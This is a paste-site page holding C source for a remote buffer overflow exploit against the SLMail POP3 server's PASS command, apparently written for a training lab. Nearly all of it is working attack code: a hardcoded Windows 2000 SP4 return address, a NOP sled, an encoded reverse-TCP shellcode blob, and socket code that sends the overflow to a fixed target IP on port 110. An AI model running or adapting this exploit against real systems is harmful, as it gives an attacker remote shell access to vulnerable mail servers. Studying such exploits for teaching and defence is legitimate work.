Slexy.org is shutting down and stopped accepting new Pastes on May 4th, 2021.
Existing Pastes will stop being available on or after May 10th, 2021.
Author: Not specified Language: c
Description: Not specified Timestamp: 2017-09-07 00:25:36 +0000
View raw paste Reply
  1. #include <fcntl.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <sys/wait.h>
  7. #include <errno.h>
  8. #include <netinet/in.h>
  9. #include <netdb.h>
  10. #include <string.h>
  11.  
  12. #define retadd "\x8f\x35\x4a\x5f" /*win2k server sp4 0x773a459f*/
  13. #define port 110
  14.  
  15. /* Custom reverse shell re-written by me*/
  16. unsigned char shellcode[] =
  17. "\xdb\xd3\xbb\x37\x39\xd3\x94\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
  18. "\x52\x31\x5f\x17\x03\x5f\x17\x83\xf0\x3d\x31\x61\x02\xd5\x37"
  19. "\x8a\xfa\x26\x58\x02\x1f\x17\x58\x70\x54\x08\x68\xf2\x38\xa5"
  20. "\x03\x56\xa8\x3e\x61\x7f\xdf\xf7\xcc\x59\xee\x08\x7c\x99\x71"
  21. "\x8b\x7f\xce\x51\xb2\x4f\x03\x90\xf3\xb2\xee\xc0\xac\xb9\x5d"
  22. "\xf4\xd9\xf4\x5d\x7f\x91\x19\xe6\x9c\x62\x1b\xc7\x33\xf8\x42"
  23. "\xc7\xb2\x2d\xff\x4e\xac\x32\x3a\x18\x47\x80\xb0\x9b\x81\xd8"
  24. "\x39\x37\xec\xd4\xcb\x49\x29\xd2\x33\x3c\x43\x20\xc9\x47\x90"
  25. "\x5a\x15\xcd\x02\xfc\xde\x75\xee\xfc\x33\xe3\x65\xf2\xf8\x67"
  26. "\x21\x17\xfe\xa4\x5a\x23\x8b\x4a\x8c\xa5\xcf\x68\x08\xed\x94"
  27. "\x11\x09\x4b\x7a\x2d\x49\x34\x23\x8b\x02\xd9\x30\xa6\x49\xb6"
  28. "\xf5\x8b\x71\x46\x92\x9c\x02\x74\x3d\x37\x8c\x34\xb6\x91\x4b"
  29. "\x3a\xed\x66\xc3\xc5\x0e\x97\xca\x01\x5a\xc7\x64\xa3\xe3\x8c"
  30. "\x74\x4c\x36\x02\x24\xe2\xe9\xe3\x94\x42\x5a\x8c\xfe\x4c\x85"
  31. "\xac\x01\x87\xae\x47\xf8\x40\xdb\x9c\x02\xe5\xb3\xa0\x02\x04"
  32. "\xff\x2c\xe4\x6c\xef\x78\xbf\x18\x96\x20\x4b\xb8\x57\xff\x36"
  33. "\xfa\xdc\x0c\xc7\xb5\x14\x78\xdb\x22\xd5\x37\x81\xe5\xea\xed"
  34. "\xad\x6a\x78\x6a\x2d\xe4\x61\x25\x7a\xa1\x54\x3c\xee\x5f\xce"
  35. "\x96\x0c\xa2\x96\xd1\x94\x79\x6b\xdf\x15\x0f\xd7\xfb\x05\xc9"
  36. "\xd8\x47\x71\x85\x8e\x11\x2f\x63\x79\xd0\x99\x3d\xd6\xba\x4d"
  37. "\xbb\x14\x7d\x0b\xc4\x70\x0b\xf3\x75\x2d\x4a\x0c\xb9\xb9\x5a"
  38. "\x75\xa7\x59\xa4\xac\x63\x79\x47\x64\x9e\x12\xde\xed\x23\x7f"
  39. "\xe1\xd8\x60\x86\x62\xe8\x18\x7d\x7a\x99\x1d\x39\x3c\x72\x6c"
  40. "\x52\xa9\x74\xc3\x53\xf8";
  41. //351 bytes
  42. //windows/shell/reverse_tcp
  43.  
  44.  
  45. struct sockaddr_in plm,lar,target;
  46.  
  47. int conn(char *ip)
  48. {
  49.  int sockfd;
  50.  plm.sin_family = AF_INET;
  51.  plm.sin_port = htons(port);
  52.  plm.sin_addr.s_addr = inet_addr(ip);
  53.  bzero(&(plm.sin_zero),8);
  54.  sockfd = socket(AF_INET,SOCK_STREAM,0);
  55. if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
  56. {
  57.  perror("[-] connect error!");
  58.  exit(0);
  59. }
  60.  printf("[*] Connected to: %s.\n",ip);
  61.  return sockfd;
  62. }
  63.  
  64. int main(int argc, char *argv[])
  65. {
  66.     int xs;
  67.     char out[1024];
  68.     char *buffer = malloc(2965);
  69.     memset(buffer, 0x00, 2965);
  70.     char *off = malloc(2606);/*This is where the offset lives*/
  71.     memset(off, 0x41, 2606);
  72.     //memset(off, 0x41, 2605);
  73.     //char *nop = malloc(16);
  74.     //memset(nop, 0x00, 13);
  75.     //memset(nop, 0x90, 16);
  76.  
  77.     char *nop = malloc(8);
  78.     memset(nop, 0x00, 8);
  79.     memset(nop, 0x90, 8);
  80.  
  81.     strcat(buffer, off);
  82.     strcat(buffer, retadd);
  83.     strcat(buffer, nop);
  84.     strcat(buffer, shellcode);
  85.  
  86.     printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n");
  87.     xs = conn("10.11.12.104");
  88.     read(xs, out, 1024);
  89.     printf("[*] %s", out);
  90.     write(xs,"USER username\r\n", 15);
  91.     read(xs, out, 1024);
  92.     printf("[*] %s", out);
  93.     write(xs,"PASS ",5);
  94.     write(xs,buffer,strlen(buffer));
  95.     printf("Shellcode len: %d bytes\n",strlen(shellcode));
  96.     printf("Buffer len: %d bytes\n",strlen(buffer));
  97.     write(xs,"\r\n",4);
  98.     close(xs);  
  99. }
View raw paste Reply